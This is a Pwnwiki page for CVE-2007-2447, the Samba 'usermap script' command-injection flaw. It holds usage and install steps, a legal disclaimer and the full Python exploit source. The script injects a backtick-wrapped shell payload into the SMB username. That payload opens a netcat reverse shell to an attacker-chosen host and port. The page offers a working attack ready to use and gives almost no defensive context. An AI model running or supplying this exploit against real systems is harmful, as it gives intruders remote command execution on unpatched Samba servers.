Pwnwiki: Created page with "==INFO==

 CVE-2007-2447 ====  CVE-2007-2447 - Samba usermap script. 
 https://amriunix.com/post/cve-2007-2447-samba-usermap-script/  ## Usage: ```shell $ python userm..."

2021-04-01T03:23:49Z

Created page with "==INFO== <pre> CVE-2007-2447 ==== CVE-2007-2447 - Samba usermap script. </br> https://amriunix.com/post/cve-2007-2447-samba-usermap-script/ ## Usage: ```shell $ python userm..."

New page

==INFO==
<pre>
CVE-2007-2447
====

CVE-2007-2447 - Samba usermap script.
</br>
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

## Usage:
```shell
$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
```
* `RHOST` -- The target address
* `RPORT` -- The target port (TCP : 139)
* `LHOST` -- The listen address
* `LPORT` -- The listen port

## Installation

sudo apt install python python-pip
pip install --user pysmb
git clone https://github.com/amriunix/CVE-2007-2447.git

### Disclaimer:

All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

</pre>

==usermap_sctipt.py==
<pre>
#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
username = "/=`nohup " + payload + "`"
conn = SMBConnection(username, "", "", "")
try:
conn.connect(rhost, int(rport), timeout=1)
except:
print("[+] Payload was sent - check netcat !")

if __name__ == '__main__':
print("[*] CVE-2007-2447 - Samba usermap script")
if len(sys.argv) != 5:
print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
else:
print("[+] Connecting !")
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
exploit(rhost, rport, lhost, lport)

</pre>

CVE-2007-2447 Samba 3.0.0任意命令執行漏洞 - Revision history

Pwnwiki: Created page with "==INFO==
CVE-2007-2447 ==== CVE-2007-2447 - Samba usermap script.
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/ ## Usage: ```shell $ python userm..."

CVE-2007-2447 Samba 3.0.0任意命令執行漏洞 - Revision history

Pwnwiki: Created page with "==INFO== CVE-2007-2447 ==== CVE-2007-2447 - Samba usermap script. https://amriunix.com/post/cve-2007-2447-samba-usermap-script/ ## Usage: ```shell $ python userm..."

Pwnwiki: Created page with "==INFO==
CVE-2007-2447 ==== CVE-2007-2447 - Samba usermap script.
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/ ## Usage: ```shell $ python userm..."